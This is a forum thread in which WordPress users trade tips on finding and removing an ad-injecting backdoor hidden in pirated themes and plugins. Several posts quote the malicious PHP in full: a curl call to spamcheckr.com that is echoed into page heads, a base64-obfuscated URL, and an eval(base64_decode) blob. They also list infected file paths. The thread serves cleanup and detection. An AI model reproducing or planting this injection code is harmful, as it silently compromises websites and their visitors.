Beware before downloading wordpress themes and plugins [adwatch]

[nodesl]

(03-21-2014 10:52 AM)CreativeGenius81 Wrote:  I'd like to thank everyone for sharing their contributions to this thread b/c I also ran across this problem w/ a plugin that I installed (EventON).
After spending countless hours going over every line of code with a colleague, it finally dawned on me to look @ the code that "bale" suggested was the problem.

My file was hidden away in "classes/class-settings.php" and called by include 'classes/class-settings.php'; in my eventon.php file.

The key is to do a search (I used the Multi-File Search in TextWrangler of my entire site --- downloaded locally to my machine) for the following string: spamcheckr

The "infected" file (class-settings.php) has a ton of commented out lines of code, but it really only does one thing which is to pull the URL "http://spamcheckr.com/l.php". Just bringing that URL up in your browser will show a blank page. But if you view the source, you will see the following code:

Code:

var adwatch_id = 234224;    var adwatch_advert = "int";    var exclude_domains = ['wp-admin', 'wp-login', 'hillaryClinton2016.com', 'mpmgworld.com', 'madeforher.in', 'robfordformayor.ca', 'pachecovirtual.com.ar', 'corporativo2.tk', 'r3d.pt'];

As "bale" suggested, just delete the include from your file and delete that class-settings.php and you should be good to go.
Hope this helps.

thanks dude. we able to find the error with our site too. but the URL is different here http://spamcheckr.com/req.php so i think best solution is find for that spamcheckr.com then you can remove it. Again Thanks CreativeGenius81

[pgeraldes]

Hi in one off my themes (3clicks) i found the http://spamcheckr.com/l.php but on the other one (the7) cant find any string.
Does someone knows another location or link to search for?
Thanks

[pgeraldes]

Finally found it, the code is base64_decode("c3BhbWNoZWNrci5jb20vY2hlY2sucGhw") just find the string c3BhbWNoZWNrci5jb20vY2hlY2sucGhw.
Decoding this gives spamcheckr.com/check.php.
Hope that helps someone.

[djnikosdj]

Easy Social Share Buttons ALL have this (http://spamcheckr.com/l.php)http://adwat.ch/
1.DOWNLOAD TextCrawler SEARCH IN THIS PLUGIN spamcheckr (UNZIP FILES FIRST) THE CODE IS (<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc00_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,​1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc00_chesk');}} ?>) DELETE THIS CODE AND IS OK.
Easy Social Share Buttons v1.2.6 THE FILE IS lib\admin\pages\essb-settings-class.PHP
Easy Social Share Buttons v.1.2.1 – for WordPress THE FILE IS \lib\lib_class.PHP

[imxa]

(03-22-2014 02:06 AM)djnikosdj Wrote:  Easy Social Share Buttons ALL have this (http://spamcheckr.com/l.php)http://adwat.ch/
1.DOWNLOAD TextCrawler SEARCH IN THIS PLUGIN spamcheckr (UNZIP FILES FIRST) THE CODE IS () DELETE THIS CODE AND IS OK.
Easy Social Share Buttons v1.2.6 THE FILE IS lib\admin\pages\essb-settings-class.PHP
Easy Social Share Buttons v.1.2.1 – for WordPress THE FILE IS \lib\lib_class.PHP

I need to delete the code inside php or delete the entire php file? I found the spamcheckr in

MASHMENU PLUGIN: \plugins\mashmenu\js\jscolor\settings.php
EASY SOCIAL SHARE BUTTONS PLUGIN: \plugins\easy-social-share-buttons\lib\lib_class.php


what should i do?

[intrepid]

For

Code:

clickjacker.net

/plugins /cj-plugin /includes / functions.php has 100's of lines of encrypted code (truncated here):

<?php eval("?>".base64_decode("PD9waHANCiNmdW5jdGlvbnMucG.................................hwDQoNCmZ1bmlKioqKioq​KioqKg0KDQoNCj8+")); ?>

Is this malware?

Edit: all 3 of the /includes/ php files have base64 code.

[djnikosdj]

(03-22-2014 05:57 AM)imxa Wrote:  

(03-22-2014 02:06 AM)djnikosdj Wrote:  Easy Social Share Buttons ALL have this (http://spamcheckr.com/l.php)http://adwat.ch/
1.DOWNLOAD TextCrawler SEARCH IN THIS PLUGIN spamcheckr (UNZIP FILES FIRST) THE CODE IS () DELETE THIS CODE AND IS OK.
Easy Social Share Buttons v1.2.6 THE FILE IS lib\admin\pages\essb-settings-class.PHP
Easy Social Share Buttons v.1.2.1 – for WordPress THE FILE IS \lib\lib_class.PHP

I need to delete the code inside php or delete the entire php file? I found the spamcheckr in

MASHMENU PLUGIN: \plugins\mashmenu\js\jscolor\settings.php
EASY SOCIAL SHARE BUTTONS PLUGIN: \plugins\easy-social-share-buttons\lib\lib_class.php

what should i do?

only the code and you are ok

[incomsis]

Hello, someone know how to search the whole WP .php files for specific phase " http://spamcheckr.com" ?
I got the same adwat.ch problem , and i cant find what plugin or file causes it , there are just too many files to browse manually.
Any ideas guys ?

[incomsis]

I managed to find it with the help of this tool - fileseek

http://www.fileseek.ca/

Here is screenshot: http://puu.sh/7Hvp8/c796f49b08.png

Plugin infected: Visual Composer v4.0.1
Tho I don't remember where I downloaded it from.

More screenshots:
Dreamweaver: http://puu.sh/7Hvuz/9a77c5e065.png
Notepad++: http://puu.sh/7Hvxs/6b142cdcb3.png
WordPad: http://puu.sh/7HvAv/c0f9477a6c.png

The question is - how to remove it safely?

Because I am using the Visual Composer Plugin and if I delete the entire files I'm gettin errors...

Hope this info will help you find your infected files!

EDIT: For those who are using the same infected plugin,

here is a clean version of it, also the latest one - here

Here is a screenshot of the scan - it's clean.

[Gadzookz]

Found the spamcheckr issue in WPRightClick plugin using fileSeek Pro.